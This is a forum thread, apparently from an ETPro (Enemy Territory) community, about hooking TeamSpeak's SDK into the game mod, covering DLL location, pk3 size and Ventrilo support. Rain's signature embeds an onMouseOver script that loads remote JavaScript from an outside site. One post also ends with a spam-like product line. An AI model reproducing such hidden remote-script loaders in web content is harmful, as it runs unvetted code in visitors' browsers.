TeamSpeak Overlay

Discussion about specific ET servers

Moderators: Forum moderators, developers

Rain

Post by Rain »

TeamSpeak ships with an SDK (although it's in Delphi, calling it from C wouldn't be that hard) which allows a very basic interface to a running TeamSpeak client. I've been thinking about whipping up some kind of integration, a) but I've been lazy, and b) finding the location of the SDK DLL may be difficult.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Phats

Post by Phats »

the sdk comes with every client install and is in a folder within the ts program directory. I believe there was a problem with the initial TSRemote.dll and a newer version is available on their forum www.goteamspeak.com (that said this might now ship with the latest client installs).
ouroboro

Post by ouroboro »

Rain wrote:TeamSpeak ships with an SDK (although it's in Delphi, calling it from C wouldn't be that hard) which allows a very basic interface to a running TeamSpeak client. I've been thinking about whipping up some kind of integration, a) but I've been lazy, and b) finding the location of the SDK DLL may be difficult.
and i was already hot for you over fix-gamma.exe... if you integrate ts into et i may spontaneously combust!
Please direct all gameplay-changing feature requests here.
zinx

Post by zinx »

Phats wrote:the sdk comes with every client install and is in a folder within the ts program directory. I believe there was a problem with the initial TSRemote.dll and a newer version is available on their forum www.goteamspeak.com (that said this might now ship with the latest client installs).
The problem isn't finding it for coding purposes, the problem is finding it on client machines - the dlls aren't stored in a predictable location, at least on Linux.
Zinx Verituse http://zinx.xmms.org/
Spoofeh

Post by Spoofeh »

I think you could leave that problem to the users, just add a cvar that the user has to set to point to the dll/so or something. :)
ReyalP

Post by ReyalP »

zinx wrote: The problem isn't finding it for coding purposes, the problem is finding it on client machines - the dlls aren't stored in a predictable location, at least on Linux.
My impression was they expect you to ship the DLL with your ap. So perhaps it could just go in the etpro zip.
send lawyers, guns and money
Rain

Post by Rain »

SCDS_reyalP wrote:
zinx wrote: The problem isn't finding it for coding purposes, the problem is finding it on client machines - the dlls aren't stored in a predictable location, at least on Linux.
My impression was they expect you to ship the DLL with your ap. So perhaps it could just go in the etpro zip.
Maybe... It's kind of large for that, though. :?
The pk3 size is a big concern for us.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
>>steven!

Post by >>steven! »

teamspeak blows; ventrilo > *

ps. why would u want an overlay ???, can u not recognize ur clanm8s voices. this feature would be useful if u where new to a team, but how long would u actually need it for , 2-3 hrs?
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002
Threshold

Post by Threshold »

I think you should be able to sync ETPRO and Vent together and when someone talks they light up on the fireteam... :) I wish.
Deus

Post by Deus »

Rain wrote: Maybe... It's kind of large for that, though. :?
I can provide a download mirror for etpro.zip if u need one
ReyalP

Post by ReyalP »

Rain wrote: Maybe... It's kind of large for that, though. :?
Hmm, the windows dll is only 96 k, ~50 compressed.
send lawyers, guns and money
Rain

Post by Rain »

<pre> compressed uncompressed ratio uncompressed_name<br> 97588 207512 53.0% libTSRemote.so.0.4</pre>
Although 145kb isn't terribly large, it's a significant (~8%) increase in the overall pk3 size. The size concern isn't for the etpro install .zip, but rather for the pk3 being transferred from the server to clients.

We could require you to copy the SDK DSO to the right place by hand, though, I suppose...
SnowWhite

Post by SnowWhite »

Rain wrote:We could require you to copy the SDK DSO to the right place by hand, though, I suppose...
in linux, should be enuff to only require a soft symlink at the "right" place...
Fusen

Post by Fusen »

huzzah, so it'll be finished for 3.2.0? good.
________
herbalaire review
Last edited by Fusen on Fri Feb 04, 2011 11:32 am, edited 1 time in total.
bani
Site Admin

Post by bani »

>>steven! wrote:teamspeak blows; ventrilo > *
no linux ventrilo, so no etpro-ventrilo.

you want etpro-ventrilo? get them to do a linux client.